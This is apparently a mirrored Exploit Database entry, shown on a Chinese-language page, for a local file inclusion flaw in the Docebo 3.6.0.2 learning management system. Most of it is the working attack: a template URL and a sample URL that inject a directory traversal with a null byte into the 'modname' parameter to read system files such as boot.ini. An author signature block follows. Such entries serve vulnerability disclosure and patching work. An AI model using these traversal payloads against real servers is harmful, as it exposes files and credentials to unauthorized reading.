Docebo 3.6.0.2 (stable) – Local File Inclusion

• Exploit Database
• 12 阅读

• 作者： Zer0 Thunder
  日期： 2010-01-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11028/

• # Exploit Title: Docebo 3.6.0.2 (stable) Local File Inclusion 
  # Date: 2010-01-06
  # Author: Zer0 Thunder
  # Site : http://www.docebolms.org/
  # Software Link: http://www.docebolms.org/doceboCms/
  # Version: 3.6.0.2
  # Tested on: Windows XP sp2 [WampServer 2.0i] 
  # CVE : 
  # Code :
  
  Exploit :
  http://localhost/docebo/index.php?modname=[LFI]&op=lostpwd
  
  Sample : ( Only Tested On Wamp 2.0i)
  http://localhost/docebo/index.php?modname=../../../../../../../boot.ini%00&op=lostpwd
  
  
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  ########################################
  # MSN : zer0_thunder@colombohackers.com
  # Email : neonwarlock@live.com
  # Site : LKHackers.com
  # Greetz : To all my friends
  # Note : Proud to be a Sri Lankan
  # Me : Sri Lankan Hacker
  ########################################